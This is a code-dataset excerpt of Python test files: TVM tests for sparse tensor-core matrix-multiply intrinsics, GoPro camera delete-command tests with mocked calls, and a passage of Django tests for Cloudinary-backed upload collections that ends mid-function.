hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
321cd28ff6f7db7c87b83217a34bf3fa864678f4 | 11,095 | py | Python | tests/python/unittest/test_tir_ptx_mma_sp.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 4,640 | 2017-08-17T19:22:15.000Z | 2019-11-04T15:29:46.000Z | tests/python/unittest/test_tir_ptx_mma_sp.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 2,863 | 2017-08-17T19:55:50.000Z | 2019-11-04T17:18:41.000Z | tests/python/unittest/test_tir_ptx_mma_sp.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 1,352 | 2017-08-17T19:30:38.000Z | 2019-11-04T16:09:29.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm.script import tir as T
import numpy as np
import tvm.testing
def gen_2in4_mask(m: int, n: int):
assert n % 4 == 0
return np.array(
[[np.sort(np.random.choice(4, 2, replace=False)) for _ in range(n // 4)] for _ in range(m)]
).astype("uint8")
def get_dense_mat_by_mask(val, mask):
m, n_chunks, _ = mask.shape
val = val.reshape(m, n_chunks, 2)
ret = np.zeros((m, n_chunks, 4)).astype(val.dtype)
for i in range(m):
for j in range(n_chunks):
for k in range(2):
ret[i, j, mask[i, j, k]] = val[i, j, k]
return ret.reshape(m, n_chunks * 4)
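The two helpers above implement the 2:4 structured-sparsity encoding used by sparse tensor cores: every group of four elements stores two values plus a mask of which positions they occupy. A self-contained NumPy round-trip (the helpers are copied here so the sketch runs standalone; the shapes follow the call sites in the tests below) illustrates the layout:

```python
import numpy as np

# Mirrors of the helpers above, copied so this sketch is self-contained.
def gen_2in4_mask(m, n):
    assert n % 4 == 0
    return np.array(
        [[np.sort(np.random.choice(4, 2, replace=False)) for _ in range(n // 4)]
         for _ in range(m)]
    ).astype("uint8")

def get_dense_mat_by_mask(val, mask):
    m, n_chunks, _ = mask.shape
    val = val.reshape(m, n_chunks, 2)
    ret = np.zeros((m, n_chunks, 4)).astype(val.dtype)
    for i in range(m):
        for j in range(n_chunks):
            for k in range(2):
                ret[i, j, mask[i, j, k]] = val[i, j, k]
    return ret.reshape(m, n_chunks * 4)

mask = gen_2in4_mask(16, 16)                                # (16, 4, 2): 4 groups of 4 per row
vals = np.random.uniform(-1, 1, (16, 8)).astype("float16")  # 2 kept values per group
dense = get_dense_mat_by_mask(vals, mask)                   # (16, 16) dense reconstruction

# Every group of 4 columns holds at most 2 nonzeros.
assert dense.shape == (16, 16)
assert (np.count_nonzero(dense.reshape(16, 4, 4), axis=2) <= 2).all()
```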
@T.prim_func
def mma_sp_m16n8k16_f16f16f16(a: T.handle, b: T.handle, c: T.handle, _metadata: T.handle):
T.func_attr({"global_symbol": "default_function", "tir.noalias": True})
A = T.match_buffer(a, [16, 8], dtype="float16")
B = T.match_buffer(b, [16, 8], dtype="float16")
C = T.match_buffer(c, [16, 8], dtype="float16")
metadata = T.match_buffer(_metadata, [8], dtype="uint32")
brow = T.env_thread("blockIdx.y")
bcol = T.env_thread("blockIdx.x")
tx = T.env_thread("threadIdx.x")
T.launch_thread(brow, 1)
T.launch_thread(bcol, 1)
T.launch_thread(tx, 32)
multi_a = T.allocate([4], "float16", scope="local")
multi_b = T.allocate([4], "float16", scope="local")
accum = T.allocate([4], "float16", scope="local")
meta_local = T.allocate([1], "uint32", scope="local")
for i in range(4):
accum[i] = T.float16(0)
for i in range(4):
multi_a[i] = A[tx // 4 + i // 2 * 8, tx % 4 * 2 + i % 2]
for i in range(4):
multi_b[i] = B[tx % 4 * 2 + i % 2 + i // 2 * 8, tx // 4]
meta_local[0] = metadata[tx // 4]
T.evaluate(
T.ptx_mma_sp(
"m16n8k16",
"row",
"col",
"fp16",
"fp16",
"fp16",
multi_a.data,
0,
multi_b.data,
0,
accum.data,
0,
meta_local.data,
0,
0,
False,
dtype="float16",
)
)
for i in range(4):
C[i // 2 * 8 + tx // 4, tx % 4 * 2 + i % 2] = accum[i]
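The index arithmetic in the loads and the epilogue above encodes the per-thread fragment layout of the m16n8k16 MMA: thread tx owns rows tx // 4 and tx // 4 + 8 and a pair of adjacent columns. A small sketch (plain Python, mirroring the index expressions above; the layout itself is read off the code, not independently verified against the PTX spec) enumerates the A-fragment coordinates and checks that the 32 threads tile the 16x8 compressed operand exactly once:

```python
# Per-thread A-fragment coordinates, mirroring the index math above:
#   multi_a[i] = A[tx // 4 + i // 2 * 8, tx % 4 * 2 + i % 2]
def a_fragment_coords(tx):
    return [(tx // 4 + i // 2 * 8, tx % 4 * 2 + i % 2) for i in range(4)]

# Thread 0 touches rows {0, 8} and columns {0, 1}.
assert a_fragment_coords(0) == [(0, 0), (0, 1), (8, 0), (8, 1)]

# Together, the 32 threads cover every element of the 16x8 operand exactly once.
covered = [c for tx in range(32) for c in a_fragment_coords(tx)]
assert len(covered) == len(set(covered)) == 16 * 8
```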
@T.prim_func
def mma_sp_m16n8k16_f16f16f32(a: T.handle, b: T.handle, c: T.handle, _metadata: T.handle):
T.func_attr({"global_symbol": "default_function", "tir.noalias": True})
A = T.match_buffer(a, [16, 8], dtype="float16")
B = T.match_buffer(b, [16, 8], dtype="float16")
C = T.match_buffer(c, [16, 8], dtype="float32")
metadata = T.match_buffer(_metadata, [8], dtype="uint32")
brow = T.env_thread("blockIdx.y")
bcol = T.env_thread("blockIdx.x")
tx = T.env_thread("threadIdx.x")
T.launch_thread(brow, 1)
T.launch_thread(bcol, 1)
T.launch_thread(tx, 32)
multi_a = T.allocate([4], "float16", scope="local")
multi_b = T.allocate([4], "float16", scope="local")
accum = T.allocate([4], "float32", scope="local")
meta_local = T.allocate([1], "uint32", scope="local")
for i in range(4):
accum[i] = T.float32(0)
for i in range(4):
multi_a[i] = A[tx // 4 + i // 2 * 8, tx % 4 * 2 + i % 2]
for i in range(4):
multi_b[i] = B[tx % 4 * 2 + i % 2 + i // 2 * 8, tx // 4]
meta_local[0] = metadata[tx // 4]
T.evaluate(
T.ptx_mma_sp(
"m16n8k16",
"row",
"col",
"fp16",
"fp16",
"fp32",
multi_a.data,
0,
multi_b.data,
0,
accum.data,
0,
meta_local.data,
0,
0,
False,
dtype="float32",
)
)
for i in range(4):
C[i // 2 * 8 + tx // 4, tx % 4 * 2 + i % 2] = accum[i]
@T.prim_func
def mma_sp_m16n8k32_f16f16f16(a: T.handle, b: T.handle, c: T.handle, _metadata: T.handle):
T.func_attr({"global_symbol": "default_function", "tir.noalias": True})
A = T.match_buffer(a, [16, 16], dtype="float16")
B = T.match_buffer(b, [32, 8], dtype="float16")
C = T.match_buffer(c, [16, 8], dtype="float16")
metadata = T.match_buffer(_metadata, [16], dtype="uint32")
brow = T.env_thread("blockIdx.y")
bcol = T.env_thread("blockIdx.x")
tx = T.env_thread("threadIdx.x")
T.launch_thread(brow, 1)
T.launch_thread(bcol, 1)
T.launch_thread(tx, 32)
multi_a = T.allocate([8], "float16", scope="local")
multi_b = T.allocate([8], "float16", scope="local")
accum = T.allocate([4], "float16", scope="local")
meta_local = T.allocate([1], "uint32", scope="local")
for i in range(4):
accum[i] = T.float16(0)
for i in range(8):
multi_a[i] = A[(i % 4) // 2 * 8 + tx // 4, i // 4 * 8 + tx % 4 * 2 + i % 2]
for i in range(8):
multi_b[i] = B[i // 2 * 8 + tx % 4 * 2 + i % 2, tx // 4]
meta_local[0] = metadata[tx // 4 * 2 + tx % 2]
T.evaluate(
T.ptx_mma_sp(
"m16n8k32",
"row",
"col",
"fp16",
"fp16",
"fp16",
multi_a.data,
0,
multi_b.data,
0,
accum.data,
0,
meta_local.data,
0,
0,
False,
dtype="float16",
)
)
for i in range(4):
C[i // 2 * 8 + tx // 4, tx % 4 * 2 + i % 2] = accum[i]
@T.prim_func
def mma_sp_m16n8k32_f16f16f32(a: T.handle, b: T.handle, c: T.handle, _metadata: T.handle):
T.func_attr({"global_symbol": "default_function", "tir.noalias": True})
A = T.match_buffer(a, [16, 16], dtype="float16")
B = T.match_buffer(b, [32, 8], dtype="float16")
C = T.match_buffer(c, [16, 8], dtype="float32")
metadata = T.match_buffer(_metadata, [16], dtype="uint32")
brow = T.env_thread("blockIdx.y")
bcol = T.env_thread("blockIdx.x")
tx = T.env_thread("threadIdx.x")
T.launch_thread(brow, 1)
T.launch_thread(bcol, 1)
T.launch_thread(tx, 32)
multi_a = T.allocate([8], "float16", scope="local")
multi_b = T.allocate([8], "float16", scope="local")
accum = T.allocate([4], "float32", scope="local")
meta_local = T.allocate([1], "uint32", scope="local")
for i in range(4):
accum[i] = T.float32(0)
for i in range(8):
multi_a[i] = A[(i % 4) // 2 * 8 + tx // 4, i // 4 * 8 + tx % 4 * 2 + i % 2]
for i in range(8):
multi_b[i] = B[i // 2 * 8 + tx % 4 * 2 + i % 2, tx // 4]
meta_local[0] = metadata[tx // 4 * 2 + tx % 2]
T.evaluate(
T.ptx_mma_sp(
"m16n8k32",
"row",
"col",
"fp16",
"fp16",
"fp32",
multi_a.data,
0,
multi_b.data,
0,
accum.data,
0,
meta_local.data,
0,
0,
False,
dtype="float32",
)
)
for i in range(4):
C[i // 2 * 8 + tx // 4, tx % 4 * 2 + i % 2] = accum[i]
@tvm.testing.requires_cuda
def test_mma_sp_m16n8k16_f16():
def get_meta_m16n8k16_half(mask):
assert mask.shape == (16, 4, 2)
mask = mask.reshape(16, 8)
ret = np.zeros((8,)).astype("uint32")
for i in range(8):
base = 1
for blk in range(2):
for j in range(8):
ret[i] |= int(mask[blk * 8 + i, j]) * base
base = base << 2
return ret
for out_dtype in ["float16", "float32"]:
func = mma_sp_m16n8k16_f16f16f16 if out_dtype == "float16" else mma_sp_m16n8k16_f16f16f32
sch = tvm.tir.Schedule(func)
arch = tvm.contrib.nvcc.get_target_compute_version()
major, _ = tvm.contrib.nvcc.parse_compute_version(arch)
if major < 8:
# Requires SM80+
return
cuda_mod = tvm.build(sch.mod, target="cuda")
A_np = np.random.uniform(-1, 1, [16, 8]).astype("float16")
B_np = np.random.uniform(-1, 1, [16, 8]).astype("float16")
mask = gen_2in4_mask(16, 16)
A_dense_np = get_dense_mat_by_mask(A_np, mask)
C_np = np.matmul(A_dense_np, B_np).astype(out_dtype)
meta = get_meta_m16n8k16_half(mask)
ctx = tvm.cuda()
A_tvm = tvm.nd.array(A_np, ctx)
B_tvm = tvm.nd.array(B_np, ctx)
C_tvm = tvm.nd.array(np.zeros_like(C_np), ctx)
meta_tvm = tvm.nd.array(meta, ctx)
cuda_mod(A_tvm, B_tvm, C_tvm, meta_tvm)
tvm.testing.assert_allclose(C_tvm.numpy(), C_np, atol=1e-3, rtol=1e-3)
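get_meta_m16n8k16_half above packs the 2-bit column indices into uint32 metadata words, LSB-first: word i holds the eight indices of row i followed by the eight of row i + 8, two bits each. A minimal sketch of the packing for a single word, assuming that layout:

```python
import numpy as np

def pack_meta_word(indices):
    # indices: 16 two-bit values (0..3), packed LSB-first at 2 bits each,
    # mirroring the base-shifting loop in get_meta_m16n8k16_half above.
    word = 0
    for j, idx in enumerate(indices):
        word |= int(idx) << (2 * j)
    return np.uint32(word)

# Keeping columns 0 and 1 in every group yields the repeating bit
# pattern 0b0100, i.e. 0x44444444.
assert pack_meta_word([0, 1] * 8) == np.uint32(0x44444444)
```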
@tvm.testing.requires_cuda
def test_mma_sp_m16n8k32_f16():
def get_meta_m16n8k32_half(mask):
assert mask.shape == (16, 8, 2)
mask = mask.reshape(16, 2, 8)
ret = np.zeros((8, 2)).astype("uint32")
for i in range(8):
for k in range(2):
base = 1
for blk in range(2):
for j in range(8):
ret[i, k] |= int(mask[blk * 8 + i, k, j]) * base
base = base << 2
return ret.reshape(16)
for out_dtype in ["float16", "float32"]:
func = mma_sp_m16n8k32_f16f16f16 if out_dtype == "float16" else mma_sp_m16n8k32_f16f16f32
sch = tvm.tir.Schedule(func)
arch = tvm.contrib.nvcc.get_target_compute_version()
major, _ = tvm.contrib.nvcc.parse_compute_version(arch)
if major < 8:
# Requires SM80+
return
cuda_mod = tvm.build(sch.mod, target="cuda")
A_np = np.random.uniform(-1, 1, [16, 16]).astype("float16")
B_np = np.random.uniform(-1, 1, [32, 8]).astype("float16")
mask = gen_2in4_mask(16, 32)
A_dense_np = get_dense_mat_by_mask(A_np, mask)
C_np = np.matmul(A_dense_np, B_np).astype(out_dtype)
meta = get_meta_m16n8k32_half(mask)
ctx = tvm.cuda()
A_tvm = tvm.nd.array(A_np, ctx)
B_tvm = tvm.nd.array(B_np, ctx)
C_tvm = tvm.nd.array(np.zeros_like(C_np), ctx)
meta_tvm = tvm.nd.array(meta, ctx)
cuda_mod(A_tvm, B_tvm, C_tvm, meta_tvm)
tvm.testing.assert_allclose(C_tvm.numpy(), C_np, atol=1e-3, rtol=1e-3)
if __name__ == "__main__":
test_mma_sp_m16n8k16_f16()
test_mma_sp_m16n8k32_f16()
| 31.974063 | 99 | 0.542947 | 1,677 | 11,095 | 3.433512 | 0.118068 | 0.03404 | 0.019799 | 0.036297 | 0.824592 | 0.784126 | 0.775443 | 0.753387 | 0.721084 | 0.702675 | 0 | 0.075946 | 0.304552 | 11,095 | 346 | 100 | 32.066474 | 0.670295 | 0.070482 | 0 | 0.798561 | 0 | 0 | 0.079172 | 0 | 0 | 0 | 0 | 0 | 0.017986 | 1 | 0.035971 | false | 0 | 0.014388 | 0 | 0.071942 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
321f67a046365edb4ed8256045a9be4215bc041d | 2,078 | py | Python | tests/test_delete.py | waider/gopro-py-api | b18b5458f5bbe689f468842d6888104317786de8 | [
"MIT"
] | 1 | 2019-05-06T21:48:54.000Z | 2019-05-06T21:48:54.000Z | tests/test_delete.py | waider/gopro-py-api | b18b5458f5bbe689f468842d6888104317786de8 | [
"MIT"
] | null | null | null | tests/test_delete.py | waider/gopro-py-api | b18b5458f5bbe689f468842d6888104317786de8 | [
"MIT"
] | null | null | null | from .conftest import GoProCameraTest, GoProCameraAuthTest
from goprocam import GoProCamera
class DeleteTest(GoProCameraTest):
def test_delete_last(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
assert text == 'storage/delete/last'
m.setattr(GoProCamera.GoPro, 'gpControlCommand', verify_cmd)
self.goprocam.delete('last')
def test_delete_all(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
assert text == 'storage/delete/all'
m.setattr(GoProCamera.GoPro, 'gpControlCommand', verify_cmd)
self.goprocam.delete('all')
def test_delete_some(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
self.counter = self.counter + 1
assert text == 'storage/delete/last'
m.setattr(GoProCamera.GoPro, 'gpControlCommand', verify_cmd)
self.goprocam.counter = 0
self.goprocam.delete(2)
assert self.goprocam.counter == 2
class DeleteAuthTest(GoProCameraAuthTest):
def test_delete_last(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
assert text == 'DL'
m.setattr(GoProCamera.GoPro, 'sendCamera', verify_cmd)
self.goprocam.delete('last')
def test_delete_all(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
assert text == 'DA'
m.setattr(GoProCamera.GoPro, 'sendCamera', verify_cmd)
self.goprocam.delete('all')
def test_delete_some(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
self.counter = self.counter + 1
assert text == 'DL'
m.setattr(GoProCamera.GoPro, 'sendCamera', verify_cmd)
self.goprocam.counter = 0
self.goprocam.delete(2)
assert self.goprocam.counter == 2
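The tests above all follow one pattern: monkeypatch the camera's transport method with an assertion-only stub, then drive the public API and check what would have been sent. The same idea, stripped to its essentials (a hypothetical Camera class, not the goprocam API):

```python
class Camera:
    def gpControlCommand(self, text):
        raise NotImplementedError  # a network call in the real class

    def delete(self, option):
        self.gpControlCommand('storage/delete/%s' % option)

# Replace the transport with a recording stub, then call the high-level API.
sent = []
Camera.gpControlCommand = lambda self, text: sent.append(text)
Camera().delete('last')
assert sent == ['storage/delete/last']
```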
| 31.969231 | 72 | 0.599134 | 229 | 2,078 | 5.331878 | 0.161572 | 0.088452 | 0.127764 | 0.113022 | 0.873874 | 0.873874 | 0.873874 | 0.873874 | 0.873874 | 0.873874 | 0 | 0.005491 | 0.298845 | 2,078 | 64 | 73 | 32.46875 | 0.832533 | 0 | 0 | 0.869565 | 0 | 0 | 0.07411 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 1 | 0.26087 | false | 0 | 0.043478 | 0 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5c7e70a70e8ae9cb10d57e198ccf149c29501395 | 40 | py | Python | code/data/__init__.py | takaratruong/emergent-generalization | 20de15ee6514dba48b48c76d8cd9289d62966932 | [
"MIT"
] | 10 | 2021-06-06T01:07:54.000Z | 2022-02-27T22:34:06.000Z | code/data/__init__.py | takaratruong/emergent-generalization | 20de15ee6514dba48b48c76d8cd9289d62966932 | [
"MIT"
] | null | null | null | code/data/__init__.py | takaratruong/emergent-generalization | 20de15ee6514dba48b48c76d8cd9289d62966932 | [
"MIT"
] | 1 | 2021-07-16T18:11:23.000Z | 2021-07-16T18:11:23.000Z | from . import loader
from . import util
| 13.333333 | 20 | 0.75 | 6 | 40 | 5 | 0.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 40 | 2 | 21 | 20 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5c86b329b028f22a188e2966a54fb4cb356aac4d | 27,452 | py | Python | tests/tests/cloudinary_/models/test_collection.py | dldevinc/paper-uploads | 9414b6e6fbaa52eadacd9852ce3c4d84c6c2c939 | [
"BSD-3-Clause"
] | 3 | 2020-06-05T10:43:05.000Z | 2022-02-22T16:46:16.000Z | tests/tests/cloudinary_/models/test_collection.py | dldevinc/paper-uploads | 9414b6e6fbaa52eadacd9852ce3c4d84c6c2c939 | [
"BSD-3-Clause"
] | 2 | 2021-04-03T12:25:20.000Z | 2022-02-02T06:10:46.000Z | tests/tests/cloudinary_/models/test_collection.py | dldevinc/paper-uploads | 9414b6e6fbaa52eadacd9852ce3c4d84c6c2c939 | [
"BSD-3-Clause"
] | null | null | null | import posixpath
from contextlib import contextmanager
import cloudinary.exceptions
import pytest
from cloudinary import uploader
from django.core.files import File
from django.template.loader import render_to_string
from django.utils.crypto import get_random_string
from app.models.site import (
CloudinaryCompleteCollection,
CloudinaryFileCollection,
CloudinaryMediaCollection,
)
from paper_uploads.cloudinary.models import (
CloudinaryFileItem,
CloudinaryImageItem,
CloudinaryMediaItem,
)
from paper_uploads.exceptions import UnsupportedFileError
from ... import utils
from ...dummy import *
from ...models.test_dummy import (
TestFileFieldResourceAttach,
TestFileFieldResourceDelete,
TestFileFieldResourceEmpty,
TestFileFieldResourceRename,
TestImageFieldResourceAttach,
TestImageFieldResourceDelete,
TestImageFieldResourceEmpty,
TestImageFieldResourceRename,
)
from ...models.test_collection import CollectionItemMixin
from .test_base import CloudinaryFileResource
class TestFileItem(CollectionItemMixin, CloudinaryFileResource):
resource_url = '/media/collections/files/%Y-%m-%d'
resource_location = 'collections/files/%Y-%m-%d'
resource_name = 'document'
resource_extension = 'pdf'
resource_size = 3028
resource_checksum = '93e67b2ff2140c3a3f995ff9e536c4cb58b5df482dd34d47a39cf3337393ef7e'
file_field_name = 'file'
collection_class = CloudinaryCompleteCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = CloudinaryFileItem()
storage.resource.attach_to(storage.collection)
with open(DOCUMENT_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp)
storage.resource.save()
yield
storage.resource.delete_file()
storage.resource.delete()
storage.collection.delete()
def test_get_file_folder(self, storage):
assert storage.resource.get_file_folder() == self.resource_location
def test_display_name(self, storage):
assert storage.resource.display_name == self.resource_name
def test_item_type(self, storage):
assert storage.resource.item_type == 'file'
def test_type(self, storage):
file_field = storage.resource.get_file_field()
assert file_field.type == 'private'
assert file_field.resource_type == 'raw'
def test_public_id(self, storage):
public_id = storage.resource.get_file().public_id
pattern = posixpath.join(self.resource_location, 'document{suffix}.pdf')
assert public_id == utils.get_target_filepath(pattern, public_id)
def test_name(self, storage):
file_name = storage.resource.name
pattern = posixpath.join(self.resource_location, 'document{suffix}.pdf')
assert file_name == utils.get_target_filepath(pattern, file_name)
def test_read(self, storage):
with storage.resource.open() as fp:
assert fp.read(4) == b'%PDF'
def test_as_dict(self, storage):
assert storage.resource.as_dict() == {
'id': 1,
'collectionId': 1,
'itemType': 'file',
'name': self.resource_name,
'extension': self.resource_extension,
'size': self.resource_size,
'caption': '{}.{}'.format(self.resource_name, self.resource_extension),
'order': 0,
'preview': render_to_string(
'paper_uploads/items/preview/file.html',
storage.resource.get_preview_context()
),
'url': storage.resource.get_file_url(),
'created': storage.resource.created_at.isoformat(),
'modified': storage.resource.modified_at.isoformat(),
'uploaded': storage.resource.uploaded_at.isoformat(),
}
def test_file_supported(self, storage):
with open(DOCUMENT_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
with open(NATURE_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
with open(MEDITATION_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
with open(AUDIO_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
@pytest.mark.django_db
class TestFileItemAttach(TestFileFieldResourceAttach):
resource_class = CloudinaryFileItem
collection_class = CloudinaryFileCollection
@contextmanager
def get_resource(self):
collection = self.collection_class.objects.create()
resource = self.resource_class()
resource.attach_to(collection)
try:
yield resource
finally:
resource.delete_file()
collection.delete()
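get_resource above uses contextlib.contextmanager to pair resource creation with guaranteed cleanup via try/finally: the file and collection are deleted even if the test body raises. The same shape, reduced to its essentials with hypothetical names:

```python
from contextlib import contextmanager

@contextmanager
def managed(log):
    # Setup runs before the yield; cleanup in finally runs on exit or error.
    log.append('create')
    try:
        yield 'resource'
    finally:
        log.append('cleanup')

log = []
with managed(log) as r:
    assert r == 'resource'
assert log == ['create', 'cleanup']
```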
class TestFileItemRename(TestFileFieldResourceRename):
resource_class = CloudinaryFileItem
resource_location = 'collections/files/%Y-%m-%d'
collection_class = CloudinaryFileCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.uid = get_random_string(5)
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(NATURE_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_cfile_name_{}.jpg'.format(storage.uid))
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.rename_file('new_cfile_name_{}.png'.format(storage.uid))
yield
storage.resource.delete_file()
storage.resource.delete()
def test_old_file_exists(self, storage):
file = storage.resource.get_file()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_new_file_exists(self, storage):
file = storage.resource.get_file()
uploader.explicit(
file.name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_old_file_name(self, storage):
assert storage.old_source_name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'old_cfile_name_{}{{suffix}}.jpg'.format(storage.uid)),
storage.old_source_name
)
def test_new_file_name(self, storage):
file = storage.resource.get_file()
assert file.name == utils.get_target_filepath(
